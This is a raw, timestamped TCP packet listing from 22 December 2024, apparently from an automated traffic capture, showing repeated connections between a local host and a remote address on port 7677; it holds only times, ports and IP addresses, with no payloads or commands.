                            Dec 22, 2024 09:29:10.831754923 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.831788063 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.831809044 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.835617065 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.835666895 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.835773945 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.835808039 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.835886955 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.835930109 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.839608908 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.839652061 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.839688063 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.839970112 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.840190887 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.840276003 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.843645096 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.843707085 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.843738079 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.844161987 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.844213963 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.844263077 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.847690105 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.847740889 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.847776890 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.848263025 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.848417997 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.848459959 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.851788044 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.851833105 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.851901054 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.852377892 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.852564096 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.852621078 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.855820894 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.855879068 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.855915070 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.856590986 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.856723070 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.856766939 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.859853983 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.859899998 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.859905005 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.860594034 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.860811949 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.860857964 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.864166975 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.864202023 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.864216089 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.864773035 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.864981890 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.865026951 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.868015051 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.868067026 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.868119001 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.868876934 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.868983030 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.869031906 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.872083902 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.872128963 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.872175932 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.873140097 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.873208046 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.873250961 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.876435041 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.876478910 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.877393007 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.877444983 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.877485991 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.881731987 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.882028103 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.882071972 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.886442900 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.886533976 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.886575937 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.889986992 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.890074968 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.890120029 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.893534899 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.893652916 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.893702030 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.897640944 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.897759914 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.897809029 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.902821064 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.902920008 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.902966022 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.906568050 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.906620979 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.906665087 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.910497904 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.910599947 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.910650015 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.914170027 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.914261103 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.914314985 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.918229103 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.918355942 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.918399096 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.922430038 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.922528028 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.922573090 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.926266909 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.926400900 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.926445007 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.926521063 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.926556110 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.926599979 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.927915096 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.928069115 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.928112030 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.931037903 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.931092024 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.931142092 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.931757927 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.932779074 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.932832956 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.932851076 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.934706926 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.934808016 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.934848070 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.935780048 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.935888052 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.938816071 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.938904047 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.938946962 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.942944050 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.942996025 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.943039894 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.947091103 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.947143078 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.947195053 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.951179981 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.951327085 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.951376915 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.955307007 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.955384970 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.955459118 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.959372997 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.960194111 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.960288048 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.960335970 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.961560011 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.961699963 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.961745977 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.964375019 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.964462042 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.964507103 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.967045069 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.967155933 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:10.967197895 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:10.969796896 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.003777027 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.007626057 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.007746935 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.007786036 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.009331942 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.009547949 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.009587049 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.012877941 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.012974024 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.013025999 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.016822100 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.017004967 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.017043114 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.019392014 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.020184994 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.020253897 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.020306110 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.042536974 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.042658091 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.042701960 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.043952942 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.044063091 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.044110060 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.046685934 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.046797037 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.046835899 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.049300909 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.097531080 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:11.901422024 CET76774973845.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:11.942143917 CET497387677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:12.005924940 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:12.074868917 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:12.126544952 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:12.126619101 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:12.195061922 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:12.195207119 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:12.943516016 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:13.063215017 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:13.063465118 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:13.989824057 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:14.067928076 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:14.943430901 CET497387677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:18.774816036 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:18.895129919 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:18.895204067 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:18.895236969 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:18.895265102 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:19.530600071 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:19.530838013 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:19.650410891 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:20.489411116 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:20.609211922 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:20.609255075 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:20.609291077 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:20.609318972 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:21.166152000 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:21.249398947 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:21.249629021 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:21.286552906 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:21.286582947 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:21.286639929 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:21.286668062 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:21.369237900 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:21.922535896 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:21.922981977 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:22.042615891 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:29.833781958 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:29.833784103 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:29.953421116 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:29.953526974 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:30.364742994 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:30.366378069 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:30.411995888 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:30.412002087 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:30.544481039 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:30.551487923 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:30.664057970 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:30.671077013 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:30.724625111 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:30.844454050 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:31.256556034 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:31.304543018 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:31.463490963 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:31.583149910 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:47.930079937 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:47.930130005 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:48.050035954 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:48.050072908 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:48.461496115 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:48.463073015 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:48.509010077 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:48.509042978 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:48.625688076 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:48.633096933 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:48.745398045 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:48.752712965 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:48.790544987 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:48.910399914 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:49.321837902 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:49.380451918 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:49.797136068 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:49.916990042 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:06.063807964 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:06.110193968 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:06.184361935 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:06.229789019 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:06.596607924 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:06.640861034 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:06.643614054 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:06.699872017 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:06.847846985 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:06.877763987 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:06.967350960 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:06.997838974 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:07.266596079 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:07.386197090 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:07.797791958 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:07.846184969 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:07.866573095 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:07.986135006 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:23.373635054 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:23.404849052 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:23.493479967 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:23.524677038 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:23.906037092 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:23.935837984 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:23.959129095 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:23.990360022 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:24.007057905 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:24.042670012 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:24.126645088 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:24.162314892 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:24.249010086 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:24.368846893 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:24.780489922 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:24.832555056 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:24.863259077 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:24.982774973 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:40.655158043 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:40.764569044 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:40.774772882 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:40.884121895 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:41.187731981 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:41.238261938 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:41.295217991 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:41.305105925 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:41.347630978 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:41.425107002 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:41.442307949 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:41.561835051 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:41.566483021 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:41.686115980 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:42.097865105 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:42.149470091 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:42.349984884 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:42.469623089 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:59.099174023 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:59.218640089 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:59.396166086 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:59.515661001 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:59.631720066 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:59.686748981 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:59.861727953 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:59.926510096 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:30:59.977554083 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:30:59.981270075 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:00.050121069 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:00.169543982 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:00.333858967 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:00.453358889 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:00.864976883 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:00.916374922 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:00.952557087 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:01.072144985 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:17.355031013 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:17.474539995 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:17.504853010 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:17.624353886 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:17.897620916 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:17.950242996 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:18.006402969 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:18.125984907 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:18.319916964 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:18.368045092 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:18.413450003 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:18.439620018 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:18.514720917 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:18.634251118 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:18.858803034 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:18.903727055 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:19.002255917 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:19.121787071 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:35.424213886 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:35.543725014 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:35.580521107 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:35.700005054 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:35.966181993 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:36.007374048 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:36.080126047 CET497407677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:36.119379044 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:36.174563885 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:36.199695110 CET76774974045.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:36.266881943 CET497397677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:36.378093004 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:36.386442900 CET76774973945.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:36.497525930 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:37.258836985 CET76774974145.204.213.99192.168.2.4
                            Dec 22, 2024 09:31:37.299954891 CET497417677192.168.2.445.204.213.99
                            Dec 22, 2024 09:31:37.420332909 CET497417677192.168.2.445.204.213.99
